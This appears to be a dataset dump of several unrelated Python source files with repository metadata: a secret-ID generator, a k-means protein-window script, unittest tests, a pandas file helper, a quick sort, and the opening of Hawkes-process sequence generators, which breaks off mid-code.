4447797a9aae9e4e0e21cce2510d72157327de0f | 255 | py | Python | neos/secrets.py | mralext20/neos.py | 5e83a868969a9782ddfc7eba023108290ccda97c | [
"MIT"
] | 2 | 2021-03-30T16:24:19.000Z | 2021-04-06T08:20:55.000Z | neos/secrets.py | mralext20/neos.py | 5e83a868969a9782ddfc7eba023108290ccda97c | [
"MIT"
] | null | null | null | neos/secrets.py | mralext20/neos.py | 5e83a868969a9782ddfc7eba023108290ccda97c | [
"MIT"
] | null | null | null | import random
import string
def generate() -> str:
"""
direct reimpl of secretID.js from account.neosvr.com
"""
length = 12
valid_chars = string.ascii_letters + string.digits
return "".join(random.choices(valid_chars, k=length))
| 21.25 | 57 | 0.678431 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 70 | 0.27451 |
4449271c863f70b26b80fbfbede707ee87657d0c | 5,565 | py | Python | BresMaker.py | EvolveWithProseeker/Proseeker | 640c54952fc9295d03a2fdb22a452a8e4f6d4611 | [
"MIT"
] | 3 | 2021-05-31T00:56:30.000Z | 2022-03-23T14:24:09.000Z | BresMaker.py | EvolveWithProseeker/Proseeker | 640c54952fc9295d03a2fdb22a452a8e4f6d4611 | [
"MIT"
] | null | null | null | BresMaker.py | EvolveWithProseeker/Proseeker | 640c54952fc9295d03a2fdb22a452a8e4f6d4611 | [
"MIT"
] | 1 | 2022-03-24T08:49:30.000Z | 2022-03-24T08:49:30.000Z | # Simplified Bres Maker
# Version: 1.0
#Python Version: 2.0
# IMPORTS
import pandas as pd
import numpy as np
from sklearn.cluster import KMeans
from numpy import asarray
from numpy import savetxt
import sys
import os
# DEFINITIONS
def find(s, ch):
return [i for i, ltr in enumerate(s) if ltr == ch]
# DATALOAD
#user_input = str(sys.argv[1])
#ranking = str(sys.argv[2])
#working = str(sys.argv[3])
#iterations = int(sys.argv[4])
#trys = int(sys.argv[5])
user_input = "D:/Proseeker/exampledeets.csv"
ranking = "D:/Proseeker/ranking.csv"
working = "D:/Proseeker"
iterations = 1000000
trys = 1000
aavals = pd.read_csv(ranking, usecols=['A','R','N','D','C','Q','E','G','H','I','L','K','M','F','P','S','T','W','Y','V'],
sep =',')
d = {}
for i in range(0,544):
for j in range(0,20):
rowmin = min(aavals.iloc[i])
rowmax = max(aavals.iloc[i])
val = aavals.iloc[i, j]
aavals.replace([aavals.iloc[i, j]], (val - rowmin)/(rowmax - rowmin))
d['A'] = list(aavals['A'])
d['R'] = list(aavals['R'])
d['D'] = list(aavals['D'])
d['N'] = list(aavals['N'])
d['C'] = list(aavals['C'])
d['E'] = list(aavals['E'])
d['Q'] = list(aavals['Q'])
d['G'] = list(aavals['G'])
d['H'] = list(aavals['H'])
d['I'] = list(aavals['I'])
d['L'] = list(aavals['L'])
d['K'] = list(aavals['K'])
d['M'] = list(aavals['M'])
d['F'] = list(aavals['F'])
d['P'] = list(aavals['P'])
d['S'] = list(aavals['S'])
d['T'] = list(aavals['T'])
d['W'] = list(aavals['W'])
d['Y'] = list(aavals['Y'])
d['V'] = list(aavals['V'])
library = pd.read_csv(user_input, header=None, sep=',')
seqs = library[0]
sites = library[1]
# PROCESSING
for x in range(0, len(seqs)):
subjectstd = list(seqs[x])
subject = list.copy(subjectstd)
for p in range(0,len(subjectstd)):
subject.append(subjectstd[p])
for z in range(0, len(subject)):
if subject[z] == 'A':
subject[z] = d['A']
elif subject[z] == 'a':
subject[z] = d['A']
elif subject[z] == 'R':
subject[z] = d['R']
elif subject[z] == 'r':
subject[z] = d['R']
elif subject[z] == 'N':
subject[z] = d['N']
elif subject[z] == 'n':
subject[z] = d['N']
elif subject[z] == 'D':
subject[z] = d['D']
elif subject[z] == 'd':
subject[z] = d['D']
elif subject[z] == 'C':
subject[z] = d['C']
elif subject[z] == 'c':
subject[z] = d['C']
elif subject[z] == 'Q':
subject[z] = d['Q']
elif subject[z] == 'q':
subject[z] = d['Q']
elif subject[z] == 'E':
subject[z] = d['E']
elif subject[z] == 'e':
subject[z] = d['E']
elif subject[z] == 'G':
subject[z] = d['G']
elif subject[z] == 'g':
subject[z] = d['G']
elif subject[z] == 'H':
subject[z] = d['H']
elif subject[z] == 'h':
subject[z] = d['H']
elif subject[z] == 'I':
subject[z] = d['I']
elif subject[z] == 'i':
subject[z] = d['I']
elif subject[z] == 'L':
subject[z] = d['L']
elif subject[z] == 'l':
subject[z] = d['L']
elif subject[z] == 'K':
subject[z] = d['K']
elif subject[z] == 'k':
subject[z] = d['K']
elif subject[z] == 'M':
subject[z] = d['M']
elif subject[z] == 'm':
subject[z] = d['M']
elif subject[z] == 'F':
subject[z] = d['F']
elif subject[z] == 'f':
subject[z] = d['F']
elif subject[z] == 'P':
subject[z] = d['P']
elif subject[z] == 'p':
subject[z] = d['P']
elif subject[z] == 'S':
subject[z] = d['S']
elif subject[z] == 's':
subject[z] = d['S']
elif subject[z] == 'T':
subject[z] = d['T']
elif subject[z] == 't':
subject[z] = d['T']
elif subject[z] == 'W':
subject[z] = d['W']
elif subject[z] == 'w':
subject[z] = d['W']
elif subject[z] == 'Y':
subject[z] = d['Y']
elif subject[z] == 'y':
subject[z] = d['Y']
elif subject[z] == 'V':
subject[z] = d['V']
elif subject[z] == 'v':
subject[z] = d['V']
subjectsites = str(sites[x])
splits = find(subjectsites, ':')
splits.append(len(subjectsites))
if sum(splits) > 0:
for q in range(len(splits)):
if q == 0:
subpos = int(subjectsites[0:splits[q]])
else:
subpos = int(subjectsites[splits[q-1]+1:splits[q]])
breswindow = list((subject[subpos-6], subject[subpos-5], subject[subpos-4], subject[subpos-3],
subject[subpos-2], subject[subpos-1], subject[subpos], subject[subpos+1],
subject[subpos+2], subject[subpos+3], subject[subpos+4], subject[subpos+5],
subject[subpos+6]))
breswindow = np.column_stack(breswindow)
kmeans = KMeans(n_clusters=50, n_init=trys, max_iter=iterations, algorithm="full")
kmeans.fit(breswindow)
clusters = kmeans.labels_
breswindow = np.insert(breswindow, 13, clusters, axis=1)
savetxt(os.path.join(working, 'p{}.bres{}.csv'.format(x+1, q+1)), breswindow, delimiter=',', fmt='%f')
| 29.759358 | 120 | 0.4708 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 768 | 0.138005 |
444a190a1b95aaf1953da26833ea09f6dfc98b31 | 10,828 | py | Python | Ity/Tools/test_TestResults.py | rmomizo/Ubiqu-Ity | 67bd167c248d6f9e2810df5028b2288a828bdbfc | [
"BSD-2-Clause"
] | 11 | 2015-06-22T15:52:31.000Z | 2021-09-14T18:51:26.000Z | Ity/Tools/test_TestResults.py | rmomizo/Ubiqu-Ity | 67bd167c248d6f9e2810df5028b2288a828bdbfc | [
"BSD-2-Clause"
] | null | null | null | Ity/Tools/test_TestResults.py | rmomizo/Ubiqu-Ity | 67bd167c248d6f9e2810df5028b2288a828bdbfc | [
"BSD-2-Clause"
] | 9 | 2015-05-15T23:06:34.000Z | 2021-09-15T16:05:51.000Z | import copy
from unittest import TestCase
import TestResults
__author__ = 'zthomae'
class TestArgumentParser(TestCase):
def setUp(self):
self.parser = TestResults.make_parser()
def test_type_should_not_be_optional(self):
try:
TestResults.parse_args(self.parser, '--input foo --results bar'.split())
except ValueError:
return
self.fail('Parser does not fail when a test type is not present')
def test_inputs_should_not_be_optional(self):
try:
TestResults.parse_args(self.parser, '--type foo --results bar'.split())
except ValueError:
return
self.fail('Parser does not fail when input files are not present')
def test_results_should_not_be_optional(self):
try:
TestResults.parse_args(self.parser, '--type foo --input bar'.split())
except ValueError:
return
self.fail('Parser does not fail when results files are not present')
def test_only_one_type_allowed(self):
try:
TestResults.parse_args(self.parser, '--type two words --input foo --results bar'.split())
except SystemExit: # TODO: Wrap argparse behavior
return
self.fail('Parser accepts more than one test type')
def test_should_expect_at_least_one_input_file(self):
try:
TestResults.parse_args(self.parser, '--type foo --input --results bar'.split())
except SystemExit:
return
self.fail('Parser accepts zero input files')
def test_should_expect_at_least_one_results_file(self):
try:
TestResults.parse_args(self.parser, '--type foo --input bar --results'.split())
except SystemExit:
return
self.fail('Parser accepts zero results files')
def test_should_allow_more_than_one_input_file(self):
try:
TestResults.parse_args(self.parser, '--type foo --input these files --results bar'.split())
except SystemExit:
self.fail("Parser doesn't accept multiple input files")
def test_should_allow_more_than_one_results_file(self):
try:
TestResults.parse_args(self.parser, '--type foo --input file --results these files'.split())
except SystemExit:
self.fail("Parser doesn't accept multiple results files")
class TestInputFileParser(TestCase):
def setUp(self):
self.input_files = ['/foo/bar/Text1.txt', 'bar/baz/Text2.txt', 'Text3.txt', '../Text4.txt']
self.results = TestResults.parse_input_files(self.input_files)
def test_should_use_basename(self):
if sorted(self.results.keys()) != sorted(['Text1.txt', 'Text2.txt', 'Text3.txt', 'Text4.txt']):
self.fail('parse_input_files should return a dictionary with input file basenames as keys')
def test_should_return_fullpaths(self):
if any(map(lambda x: 'fullpath' not in x, self.results.values())):
self.fail('parse_input_files should return fullpaths to input files')
class TestDocuscopeResultsParser(TestCase):
def setUp(self):
self.ds_results_file = ''.join([
'<AnnotatedText File="Text1.txt" Group="foo" />',
'<AnnotatedText File="Text2.txt" Group="foo" />',
'<AnnotatedText File="Text3.txt" Group="bar" />'
])
self.ds_results_file_2 = ''.join([
'<AnnotatedText File="Text4.txt" Group="foo" />',
'<AnnotatedText File="Text5.txt" Group="bar" />'
])
self.ds_wrong_tag_results_file = ''.join([
'<Text File="Text1.txt" Group="foo" />',
'<Text File="Text2.txt" Group="foo" />',
'<AnnotatedText File="Text3.txt" Group="foo" />'
])
self.ds_wrong_attr_results_file = ''.join([
'<AnnotatedText Fil="Text1.txt" Group="foo" />',
'<AnnotatedText File="Text2.txt" Group="foo" />',
])
def test_should_handle_one_file(self):
results = TestResults.parse_docuscope_results([self.ds_results_file])
keys = results.keys()
if any([
'Text1.txt' not in keys,
'Text2.txt' not in keys,
'Text3.txt' not in keys
]):
self.fail("parse_docuscope_results didn't add expected files for one input file")
def test_should_handle_multiples_files(self):
results = TestResults.parse_docuscope_results([self.ds_results_file, self.ds_results_file_2])
keys = results.keys()
if any([
'Text1.txt' not in keys,
'Text2.txt' not in keys,
'Text3.txt' not in keys,
'Text4.txt' not in keys,
'Text5.txt' not in keys
]):
self.fail("parse_docuscope_results didn't add expected files for multiple input files")
def test_should_not_add_files_in_wrong_element(self):
results = TestResults.parse_docuscope_results([self.ds_wrong_tag_results_file])
if len(results.keys()) > 1:
self.fail('parse_docuscope_results added files not in AnnotatedText elements')
def test_should_do_nothing_if_missing_file_attribute(self):
results = TestResults.parse_docuscope_results([self.ds_wrong_attr_results_file])
# TODO: Bad test
if len(results.keys()) != 1:
self.fail("parse_docuscope_results didn't add files correctly")
def test_should_add_present_status(self):
results = TestResults.parse_docuscope_results([self.ds_results_file])
if any(map(lambda x: 'present' not in x, results.values())):
self.fail('parse_docuscope_results should add "present" key')
def test_should_add_text(self):
results = TestResults.parse_docuscope_results([self.ds_results_file])
# TODO: This test doesn't check as much as it should
if any(map(lambda x: 'text' not in x, results.values())):
self.fail('parse_docuscope_results should add "text" key')
class TestMatchFiles(TestCase):
def setUp(self):
self.results_files = {
'Text1.txt': {'text': '', 'present': False},
'Text2.txt': {'text': '', 'present': False},
'Text3.txt': {'text': '', 'present': False}
}
def test_should_copy_results(self):
if self.results_files != TestResults.match_files([], self.results_files):
self.fail('match_files should return results_files if input_files empty')
def test_should_set_file_true_if_in_inputs(self):
files = TestResults.match_files(['Text1.txt'], self.results_files)
if files['Text1.txt']['present'] is not True:
self.fail('match_files should set entries to True if present in input_files')
def test_should_keep_file_false_if_not_in_inputs(self):
files = TestResults.match_files(['Text1.txt'], self.results_files)
if any([
files['Text2.txt']['present'] is not False,
files['Text3.txt']['present'] is not False
]):
self.fail('match_files should keep entries set to False if not present in input_files')
def test_should_not_change_input_files(self):
input_files = ['Text1.txt']
old_input = copy.copy(input_files)
TestResults.match_files(input_files, self.results_files)
if old_input != input_files:
self.fail('match_files should not change input_files')
def test_should_not_change_results_files(self):
old_results = copy.copy(self.results_files)
TestResults.match_files(['Text1.txt'], self.results_files)
if old_results != self.results_files:
self.fail('match_files should not change results_files')
class TestComputeTestPairs(TestCase):
def setUp(self):
self.job = {
'Text1.txt': {'text': 'first', 'present': True},
'Text2.txt': {'text': 'second', 'present': False},
'Text3.txt': {'text': 'third', 'present': True}
}
self.input_files = {
'Text1.txt': {'fullpath': '/Text1.txt', 'text': ''},
'Text2.txt': {'fullpath': '/Text2.txt', 'text': ''},
'Text3.txt': {'fullpath': '/Text3.txt', 'text': ''},
}
self.results = TestResults.compute_test_pairs(self.job, self.input_files, self.format)
@staticmethod
def format(text):
return text
def test_should_throw_valueerror_if_too_few_input_files(self):
input_files = copy.copy(self.input_files)
del input_files['Text3.txt']
try:
TestResults.compute_test_pairs(self.job, input_files, self.format)
except ValueError:
return
self.fail('compute_test_pairs should throw ValueError if an input file is not in input_files')
def test_should_not_include_not_present_job_files(self):
if 'Text2.txt' in self.results:
self.fail('compute_test_pairs should not include texts if they are not "present" in the job')
def test_should_not_check_if_non_present_input_files_are_missing(self):
input_files = copy.copy(self.input_files)
del input_files['Text2.txt']
try:
TestResults.compute_test_pairs(self.job, input_files, self.format)
except ValueError:
self.fail("compute_test_pairs shouldn't throw ValueError if non-present job file is not in input_files")
def test_should_return_names(self):
for v in self.results.values():
if 'name' not in v:
self.fail('compute_test_pairs should return text names')
def test_should_return_ground_truths(self):
for text in self.results:
if self.results[text]['ground_truth'] != self.job[text]['text']:
self.fail('compute_test_pairs should return ground_truth text')
def test_should_return_formatted_input_file(self):
for v in self.results.values():
if 'test_input' not in v:
self.fail('compute_test_pairs should return test_input')
class TestCompareTestPairs(TestCase):
def setUp(self):
self.test_pairs = {
'Text1.txt': {
'name': 'Text1.txt',
'ground_truth': 'foo',
'test_input': 'foo'
},
'Text2.txt': {
'name': 'Text2.txt',
'ground_truth': 'foo',
'test_input': 'bar'
}
}
self.results = TestResults.compare_test_pairs(self.test_pairs, self.compare)
@staticmethod
def compare(t1, t2):
return {}
def test_should_return_results_for_each_pair(self):
if 'results' not in self.results['Text1.txt'] or 'results' not in self.results['Text2.txt']:
self.fail('compare_test_pairs should return results for each of the test pairs')
# TODO: Test more thoroughly | 40.860377 | 116 | 0.633173 | 10,726 | 0.99058 | 0 | 0 | 111 | 0.010251 | 0 | 0 | 3,382 | 0.312338 |
444a5ccfe65d81015051a623aa67855a8610e6c7 | 2,105 | py | Python | 01-datamodeling/project02-data-modeling-with-cassandra/file_mgr.py | ultranet1/DATA-ENGINEERING-NANODEGREE-UDACITY | d04e39e7312f04307f12257157c19ea40da2f11a | [
"Apache-2.0"
] | 33 | 2020-09-01T20:10:28.000Z | 2022-02-11T06:15:55.000Z | 01-datamodeling/project02-data-modeling-with-cassandra/file_mgr.py | ultranet1/DATA-ENGINEERING-NANODEGREE-UDACITY | d04e39e7312f04307f12257157c19ea40da2f11a | [
"Apache-2.0"
] | null | null | null | 01-datamodeling/project02-data-modeling-with-cassandra/file_mgr.py | ultranet1/DATA-ENGINEERING-NANODEGREE-UDACITY | d04e39e7312f04307f12257157c19ea40da2f11a | [
"Apache-2.0"
] | 64 | 2021-01-21T11:55:34.000Z | 2022-03-10T08:14:11.000Z |
import os
import glob
import pandas as pd
class FileMgr:
"""
Manage I/O files and directories and transform files to pandas dataframe and vice versa.
"""
@staticmethod
def get_directory_files_list(directory_path: str):
"""
Get all the files in a directory path.
:directory_path: path/to/directory.
:return: array that contains all the paths to the files.
"""
file_path_list = []
for root, dirs, files in os.walk(directory_path):
file_path_list = glob.glob(os.path.join(root, '*'))
return file_path_list
@staticmethod
def file_num_rows(file_path: str) -> int:
"""
Count the number of rows of a file.
:param file_path: path/to/file.
:return: number of lines of the file.
"""
with open(file_path, 'r', encoding='utf8') as f:
return sum(1 for line in f)
@staticmethod
def read_file_to_pd(file_path: str, schema):
"""
Read a file into a pandas dataframe with a determined schema.
:param file_path: path/to/file.
:param schema: schema of the pandas dataframe
:return: pandas dataframe
"""
df = pd.read_csv(file_path)
for k, v in schema.items():
df[k] = df[k].astype(v)
return df
@staticmethod
def files_to_pd(file_path_list):
"""
Read all the files of an array and makes append of all in only one pandas dataframe.
:param file_path_list: array of files
:return: pandas dataframe with all the files.
"""
li = []
for filename in file_path_list:
df = pd.read_csv(filename, index_col=None, header=0)
li.append(df)
return pd.concat(li, axis=0, ignore_index=True)
@staticmethod
def pd_to_file(file_path, df):
"""
Writes a pandas dataframe in a csv file.
:param file_path: path/to/csv/file-
:param df: pandas dataframe.
"""
df.to_csv(file_path, sep=',', encoding='utf-8', header=1, index=False)
| 28.066667 | 92 | 0.59715 | 2,059 | 0.978147 | 0 | 0 | 1,906 | 0.905463 | 0 | 0 | 1,008 | 0.47886 |
444d912fa3629eb0be4d59d69c09ce050796a70c | 879 | py | Python | Day-111/quick_sort.py | arvimal/100DaysofCode-Python | 01e59f45b4dc06a3be9e9900456a6bd439752911 | [
"MIT"
] | 1 | 2020-06-15T05:59:01.000Z | 2020-06-15T05:59:01.000Z | Day-111/quick_sort.py | arvimal/100DaysofCode-Python | 01e59f45b4dc06a3be9e9900456a6bd439752911 | [
"MIT"
] | null | null | null | Day-111/quick_sort.py | arvimal/100DaysofCode-Python | 01e59f45b4dc06a3be9e9900456a6bd439752911 | [
"MIT"
] | 7 | 2020-01-24T23:03:58.000Z | 2021-05-31T01:00:27.000Z | #!/usr/bin/env python3
# Algorithm: Quick sort
# Referrence: https://github.com/TheAlgorithms/Python/blob/master/sorts/quick_sort.py
def quick_sort(num_list):
"""
Quick sort in Python
If length of the list is 1 or less, there is no point in sorting it.
Hence, the code works on lists with sizes greater than 1
"""
if len(num_list) <= 1:
return(num_list)
else:
pivot = num_list.pop()
less_than = []
greater_than = []
for num in num_list:
if num < pivot:
less_than.append(num)
elif num > pivot:
greater_than.append(num)
#print(less_than)
#print(pivot)
#print(greater_than)
return quick_sort(less_than) + [pivot] + quick_sort(greater_than)
num_list = [10, -1, 100, 23, 5, 98, 45, 76, -545, -300, 9999]
print(quick_sort(num_list))
| 25.114286 | 85 | 0.606371 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 351 | 0.399317 |
444e975a0c4fb13e72c462d983b88bade759c75d | 141,070 | py | Python | modules/sequence_generators.py | ZhaozhiQIAN/neurawkes | 1a3caa837b34f77ac9d078bc9bf10ff10a3bf959 | [
"MIT"
] | null | null | null | modules/sequence_generators.py | ZhaozhiQIAN/neurawkes | 1a3caa837b34f77ac9d078bc9bf10ff10a3bf959 | [
"MIT"
] | null | null | null | modules/sequence_generators.py | ZhaozhiQIAN/neurawkes | 1a3caa837b34f77ac9d078bc9bf10ff10a3bf959 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Here are the sequence generators
including LSTM generator and Hawkes generator
@author: hongyuan
"""
import pickle
import time
import numpy
import theano
from theano import sandbox
import theano.tensor as tensor
import os
#import scipy.io
from collections import defaultdict
from theano.tensor.shared_randomstreams import RandomStreams
import utils
import struct
dtype=theano.config.floatX
class HawkesGen(object):
'''
here is the sequence generator using Hawkes process
'''
def __init__(self, settings):
'''
we follow the definition of multivariate Hawkes process
mu is the base intensity and
alpha is the effect matrix and
delta is the decay matrix
we randomly sample mu, alpha, delta
'''
self.args = settings['args']
self.sum_for_time = settings['sum_for_time']
numpy.random.seed(
settings['seed_random']
)
print("initializing ... ")
if settings['path_pre_train'] == None:
self.dim_process = settings['dim_process']
self.mu = numpy.float32(
numpy.random.uniform(
low=0.0, high=1.0,
size=(self.dim_process,)
)
)
self.alpha = numpy.float32(
numpy.random.uniform(
low=10.0, high=20.0,
size=(self.dim_process, self.dim_process)
)
)
self.delta = numpy.float32(
numpy.random.uniform(
low=10.0, high=20.0,
size=(self.dim_process, self.dim_process)
)
)
else:
path_pre_train = os.path.abspath(
settings['path_pre_train']
)
with open(path_pre_train, 'rb') as f:
model_pre_train = pickle.load(f)
self.dim_process = model_pre_train['dim_process']
self.mu = model_pre_train['mu']
self.alpha = model_pre_train['alpha']
self.delta = model_pre_train['delta']
#self.intensity = numpy.copy(self.mu)
self.name = 'HawkesGen'
#
self.intensity = numpy.copy(self.mu)
self.one_seq = []
#self.flag_continue = True
self.cnt_total_event = numpy.int32(len(self.one_seq))
print("done ")
#
#
def set_params(self):
print("set the params for missing data experiments ... ")
self.dim_process = numpy.int32(4)
self.mu = numpy.float32(
numpy.ones((self.dim_process, ))
)
self.alpha = numpy.float32(
numpy.array(
[
[0.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 1.0, 0.0],
[0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0]
]
)
)
self.delta = numpy.float32(
numpy.array(
[
[1.0, 1.0, 1.0, 1.0],
[1.0, 1.0, 1.0, 1.0],
[1.0, 1.0, 1.0, 1.0],
[1.0, 1.0, 1.0, 1.0]
]
)
)
#
def set_args(self, dict_args):
self.args = dict_args
#
#
def save_model(self, file_save):
print("saving model of generator ... ")
model_dict = {
'mu': numpy.copy(self.mu),
'alpha': numpy.copy(self.alpha),
'delta': numpy.copy(self.delta),
'dim_process': self.dim_process,
'name': self.name,
'args': self.args
}
with open(file_save, 'wb') as f:
pickle.dump(model_dict, f)
#
def restart_sequence(self):
# clear the events memory and reset starting time is 0
self.intensity = numpy.copy(self.mu)
self.one_seq = []
#self.flag_continue = True
self.cnt_total_event = numpy.int32(len(self.one_seq))
#
#
#
def compute_intensity_given_past(self, time_current):
# compute the intensity of current time
# given the past events
# initiliaze with mu
# we do not neet to check
# if time_current exceeds the sequence
# since it is automatically garanteed
self.intensity = numpy.copy(self.mu)
for event in self.one_seq:
time_since_start = event['time_since_start']
#if time_current > time_since_start:
# if this event is counted as * past event *
type_event = event['type_event']
change_time = time_current - time_since_start
decay_frac = numpy.exp(
-self.delta[:, type_event] * change_time
)
# self.intensity += self.alpha[:, idx_to_occur]
self.intensity += numpy.copy(
self.alpha[:, type_event] * decay_frac
)
# intensity computation is finished
#
#
#
# we can try using another method to sample data, which is quicker
# we can first sample a point with rate \sum \lambda
# and then sample the type based on the \lambda_k
#
def sample_time_given_type(self, type_event):
# type_event is the type of event for which we want to sample the time
# it is k in our model formulation in paper
time_current = numpy.float32(0.0)
if len(self.one_seq) > 0:
time_current = self.one_seq[-1]['time_since_start']
#
self.compute_intensity_given_past(time_current)
intensity_hazard = numpy.copy(
self.intensity[type_event]
)
#
u = 1.5
while u >= 1.0:
E = numpy.random.exponential(
scale=1.0, size=None
)
U = numpy.random.uniform(
low=0.0, high=1.0, size=None
)
time_current += E / intensity_hazard
self.compute_intensity_given_past(time_current)
u = U * intensity_hazard / self.intensity[type_event]
# this snippet below is for adaptive thining
# it can speed things up
# by decreasing upper bound
# but it is closed when data is randomly generated at the beginning of this project
intensity_hazard = numpy.copy(
self.intensity[type_event]
)
#
return time_current
#
#
#
def sample_time_for_all_type(self):
# type_event is the type of event for which we want to sample the time
# it is k in our model formulation in paper
time_current = numpy.float32(0.0)
if len(self.one_seq) > 0:
time_current = self.one_seq[-1]['time_since_start']
#
self.compute_intensity_given_past(time_current)
intensity_hazard = numpy.sum(self.intensity)
#
u = 1.5
while u >= 1.0:
E = numpy.random.exponential(
scale=1.0, size=None
)
U = numpy.random.uniform(
low=0.0, high=1.0, size=None
)
time_current += E / intensity_hazard
self.compute_intensity_given_past(time_current)
u = U * intensity_hazard / numpy.sum(self.intensity)
# this snippet below is for adaptive thining
# it can speed things up
# by decreasing upper bound
# but it is toggled off when data is randomly generated at the beginning of this project
intensity_hazard = numpy.sum(self.intensity)
#
return time_current
#
#
#
def sample_one_event_sep(self):
time_of_happen = numpy.zeros(
(self.dim_process,), dtype=dtype
)
for type_event in range(self.dim_process):
# sample one event using "thinning algorithm"
time_of_happen[type_event] = numpy.copy(
self.sample_time_given_type(
type_event
)
)
#
time_since_start_new = numpy.min(time_of_happen)
type_event_new = numpy.argmin(time_of_happen)
return time_since_start_new, type_event_new
#
#
def sample_one_event_tog(self):
time_since_start_new = self.sample_time_for_all_type()
self.compute_intensity_given_past(
time_since_start_new
)
prob = self.intensity / numpy.sum(self.intensity)
type_event_new = numpy.random.choice(
range(self.dim_process), p = prob
)
return time_since_start_new, numpy.int32(type_event_new)
#
#
def sample_one_event(self):
if self.sum_for_time:
return self.sample_one_event_tog()
else:
return self.sample_one_event_sep()
#
#
def gen_one_seq(self, max_len):
self.restart_sequence()
#Liiniger (2009), p. 28, describes a "thinning algorithm":
#generate one event of each type, take the minimum,
#and discard the others.
#Details found in my paper write-up
#
#max_len is a pre-sampled value to set the length of seq
# initialize the seq
time_since_start = numpy.float32(0.0)
time_since_start_each_event = numpy.zeros(
(self.dim_process,), dtype=dtype
)
#
for idx_event in range(max_len):
time_since_start_new, type_event_new = self.sample_one_event()
self.cnt_total_event += 1
#
# update sequence
time_since_last_event = time_since_start_new - time_since_start
time_since_start = time_since_start_new
time_since_last_same_event = time_since_start - time_since_start_each_event[type_event_new]
time_since_start_each_event[type_event_new] = time_since_start
self.one_seq.append(
{
'idx_event': self.cnt_total_event,
'type_event': type_event_new,
'time_since_start': time_since_start,
'time_since_last_event': time_since_last_event,
'time_since_last_same_event': time_since_last_same_event
}
)
#
#
#
#
#
#
def gen_seqs(self, settings):
#
#print(settings)
num_seqs = settings['num_seqs']
#
self.list_seqs = []
cnt_seqs = 0
#for idx_seq in range(num_seqs):
while cnt_seqs < num_seqs:
#
max_len = numpy.int32(
round(
numpy.random.uniform(
low=settings['min_len'],
high=settings['max_len']
)
)
)
#
self.gen_one_seq(max_len)
self.list_seqs.append(self.one_seq)
cnt_seqs += 1
if cnt_seqs % 10 == 9:
print("idx seq of gen : ", (cnt_seqs, self.name))
print("total number of seqs : ", num_seqs)
#
#
def print_some(self):
print("printing some seqs ... ")
for idx_seq in range(10):
print("the id of this seq is : ", idx_seq)
seq = self.list_seqs[idx_seq]
list_events = []
list_time = []
list_dtime = []
list_items = []
for event_item in seq:
list_events.append(event_item['type_event'])
list_time.append(
round(event_item['time_since_start'], 4)
)
list_dtime.append(
round(event_item['time_since_last_event'], 4)
)
list_items.append(
(
event_item['type_event'],
round(
event_item['time_since_last_event'], 4
)
)
)
print("the events, time and diff time for : ", idx_seq)
print(list_events)
print(list_time)
print(list_dtime)
print("the list of items is : ")
print(list_items)
#
#
def save_seqs(self, file_save):
with open(file_save, 'wb') as f:
pickle.dump(self.list_seqs, f)
class HawkesInhibGen(object):
'''
here is the sequence generator using Hawkes process with inhibition
'''
def __init__(self, settings):
'''
we follow the definition of multivariate Hawkes process
mu is the base intensity and
alpha is the effect matrix and
delta is the decay matrix
we randomly sample mu, alpha, delta
'''
print("initializing ... ")
self.args = settings['args']
self.sum_for_time = settings['sum_for_time']
numpy.random.seed(
settings['seed_random']
)
if settings['path_pre_train'] == None:
self.dim_process = settings['dim_process']
self.mu = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (self.dim_process,)
)
)
self.alpha = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (self.dim_process, self.dim_process)
)
)
self.delta = numpy.float32(
numpy.random.uniform(
low=10.0, high=20.0,
size=(self.dim_process, self.dim_process)
)
)
else:
path_pre_train = os.path.abspath(
settings['path_pre_train']
)
with open(path_pre_train, 'rb') as f:
model_pre_train = pickle.load(f)
self.dim_process = model_pre_train['dim_process']
self.mu = model_pre_train['mu']
self.alpha = model_pre_train['alpha']
self.delta = model_pre_train['delta']
#self.intensity = numpy.copy(self.mu)
self.name = 'HawkesInhibGen'
#
self.intensity_tilde = numpy.copy(self.mu)
self.intensity = numpy.log(
numpy.float32(1.0) + numpy.exp(
self.intensity_tilde
)
)
#
self.intensity_tilde_ub = None
self.intensity_ub = None
#
self.one_seq = []
#self.flag_continue = True
self.cnt_total_event = numpy.int32(len(self.one_seq))
print("done ")
#
#
#
#
def set_args(self, dict_args):
self.args = dict_args
#
#
def soft_relu(self, x):
return numpy.log(numpy.float32(1.0)+numpy.exp(x))
#
def hard_relu(self, x):
return numpy.float32(0.5) * (x + numpy.abs(x) )
#
#
def save_model(self, file_save):
print("saving model of generator ... ")
model_dict = {
'mu': numpy.copy(self.mu),
'alpha': numpy.copy(self.alpha),
'delta': numpy.copy(self.delta),
'dim_process': self.dim_process,
'name': self.name,
'args': self.args
}
with open(file_save, 'wb') as f:
pickle.dump(model_dict, f)
#
def restart_sequence(self):
# clear the events memory and reset starting time is 0
self.intensity_tilde = numpy.copy(self.mu)
self.intensity = self.soft_relu(self.intensity_tilde)
#
self.intensity_tilde_ub = None
self.intensity_ub = None
#
self.one_seq = []
#self.flag_continue = True
self.cnt_total_event = numpy.int32(len(self.one_seq))
#
#
#
def compute_intensity_given_past(self, time_current):
# compute the intensity of current time
# given the past events
# initiliaze with mu
self.intensity_tilde = numpy.copy(self.mu)
for event in self.one_seq:
time_since_start = event['time_since_start']
#if time_current > time_since_start:
# if this event is counted as * past event *
type_event = event['type_event']
change_time = time_current - time_since_start
decay_frac = numpy.exp(
-self.delta[:, type_event] * change_time
)
# self.intensity += self.alpha[:, idx_to_occur]
self.intensity_tilde += numpy.copy(
self.alpha[:, type_event] * decay_frac
)
self.intensity = self.soft_relu(
self.intensity_tilde
)
# intensity computation is finished
#
#
def compute_intensity_upper_bound(self, time_current):
# compute the upper bound of intensity
# at the current time
self.intensity_tilde_ub = numpy.copy(
self.mu
)
# to speed up, this mu is not taken relu
# but it is still a upper bound
#self.hard_relu(
# self.mu
#)
for event in self.one_seq:
time_since_start = event['time_since_start']
#if time_current > time_since_start:
type_event = event['type_event']
change_time = time_current - time_since_start
decay_frac = numpy.exp(
-self.delta[:, type_event] * change_time
)
self.intensity_tilde_ub += numpy.copy(
self.hard_relu(
self.alpha[:, type_event]
